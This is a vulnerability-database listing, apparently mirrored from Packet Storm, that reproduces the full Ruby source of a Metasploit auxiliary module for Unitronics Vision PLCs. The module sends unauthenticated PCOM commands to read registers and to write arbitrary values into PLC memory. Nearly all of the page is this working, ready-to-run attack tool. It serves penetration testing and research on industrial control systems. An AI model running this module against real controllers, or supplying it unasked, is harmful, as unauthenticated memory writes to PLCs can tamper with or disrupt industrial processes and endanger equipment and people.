Lucene search
K

Unitronics PCOM Client

🗓️ 31 Aug 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 157 Views

Unitronics PCOM Client module allows unauthenticated PCOM commands to query PLC registers. It includes actions to read and write PLC memory values

Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Unitronics PCOM Client',  
'Description' => %q{  
Unitronics Vision PLCs allow unauthenticated PCOM commands  
to query PLC registers.  
},  
'Author' => [ 'Luis Rosa <lmrosa[at]dei.uc.pt>' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'URL', 'https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf' ]  
],  
'Actions' =>  
[  
['READ', { 'Description' => 'Read values from PLC memory' } ],  
['WRITE', { 'Description' => 'Write values to PLC memory' } ]  
],  
'DefaultAction' => 'READ'  
))  
  
register_options(  
[  
Opt::RPORT(20256),  
OptInt.new('UNITID', [ false, 'Unit ID (0 - 127)', 0]),  
OptInt.new('ADDRESS', [true, "PCOM memory address (0 - 65535)", 0]),  
OptInt.new('LENGTH', [true, "Number of values to read (1 - 255) (read only)", 3]),  
OptString.new('VALUES', [false, "Values to write (0 - 65535 each) (comma separated) (write only)"]),  
OptEnum.new("OPERAND", [true, 'Operand type', "MI", ["Input", "Output", "SB", "MB", "MI", "SI", "ML", "SL", "SDW","MDW"]])  
])  
end  
  
# compute and return the checksum of a PCOM ASCII message  
def pcom_ascii_checksum(msg)  
(msg.each_byte.inject(:+) % 256 ).to_s(16).upcase.rjust(2, '0')  
end  
  
# compute and return the pcom length  
def pcom_ascii_len(pcom_ascii)  
Rex::Text.hex_to_raw(pcom_ascii.length.to_s(16).rjust(4,'0').unpack('H4H4').reverse.pack('H4H4'))  
end  
  
# return a pcom ascii formatted request  
def pcom_ascii_request(command)  
unit_id = datastore['UNITID'].to_s(16).rjust(2,'0')  
# PCOM/ASCII  
pcom_ascii_payload = "" +  
"\x2f" + # '/'  
unit_id +  
command +  
pcom_ascii_checksum(unit_id + command) + # checksum  
"\x0d" # '\r'  
  
# PCOM/TCP header  
Rex::Text.rand_text_hex(2) + # transaction id  
"\x65" + # ascii (101)  
"\x00" + # reserved  
pcom_ascii_len(pcom_ascii_payload) + # length  
pcom_ascii_payload  
end  
  
def read  
if datastore['LENGTH'] + datastore['ADDRESS'] > 65535  
print_error("Invalid ADDRESS")  
return  
end  
  
case datastore['OPERAND']  
when "Input"  
cc = "RE"  
when "Output"  
cc = "RA"  
when "SB"  
cc = "GS"  
when "MB"  
cc = "RB"  
when "MI"  
cc = "RW"  
when "SI"  
cc = "GF"  
when "ML"  
cc = "RNL"  
when "SL"  
cc = "RNH"  
when "SDW"  
cc = "RNJ"  
when "MDW"  
cc = "RND"  
else  
print_error("Unknown operand #{datastore['OPERAND']}")  
return  
end  
  
address = datastore['ADDRESS'].to_s(16).rjust(4,'0')  
length = datastore['LENGTH'].to_s(16).rjust(2,'0')  
print_status("Reading #{length} values (#{datastore['OPERAND']}) starting from #{address} address")  
sock.put(pcom_ascii_request(cc + address + length))  
sock.get_once  
end  
  
def print_read_ans(ans)  
cc = ans[0..1]  
data = ans[2..ans.length]  
start_addr = datastore['ADDRESS']  
case cc  
when "RE"  
size = 1  
when "RA"  
size = 1  
when "RB"  
size = 1  
when "GS"  
size = 1  
when "RW"  
size = 4  
when "GF"  
size = 4  
when "RN"  
size = 8  
else  
print_error("Unknown answer #{cc}")  
return  
end  
data.scan(/.{#{size}}/).each_with_index {|val, i|  
print_good("[#{(start_addr + i).to_s.rjust(5,'0')}] : #{val.to_i(16)}")}  
end  
  
def write  
values = datastore['VALUES'].split(",")  
case datastore['OPERAND']  
when "Input"  
print_error("Input operand is read only")  
return  
when "Output"  
cc = "SA"  
when "SB"  
cc = "SS"  
when "MB"  
cc = "SB"  
when "MI"  
cc = "SW"  
when "SI"  
cc = "SF"  
when "ML"  
cc = "SNL"  
when "SL"  
cc = "SNH"  
when "SDW"  
cc = "SDJ"  
when "MDW"  
cc = "SND"  
else  
print_error("Unknown operand #{datastore['OPERAND']}")  
return  
end  
  
address = datastore['ADDRESS'].to_s(16).rjust(4,'0')  
length = values.length.to_s(16).rjust(2,'0')  
values_to_write = values.map{|s| s.to_i(10).to_s(16).rjust(4,'0')}.join  
print_status("Writing #{length} #{datastore['OPERAND']} (#{datastore['VALUES']}) starting from #{address} address")  
sock.put(pcom_ascii_request(cc + address + length + values_to_write))  
sock.get_once  
end  
  
def run  
connect  
case action.name  
when "READ"  
if datastore['LENGTH'] == nil  
print_error("The option VALUES is not set")  
return  
else  
ans = read  
if ans == nil  
print_error("No answer from PLC")  
return  
end  
print_read_ans(ans.to_s[10..(ans.length-4)])  
end  
when "WRITE"  
if datastore['VALUES'] == nil  
print_error("The option VALUES is not set")  
return  
else  
ans = write  
if ans == nil  
print_error("No answer from PLC")  
return  
end  
end  
else  
print_error("Unknown action #{action.name}")  
end  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation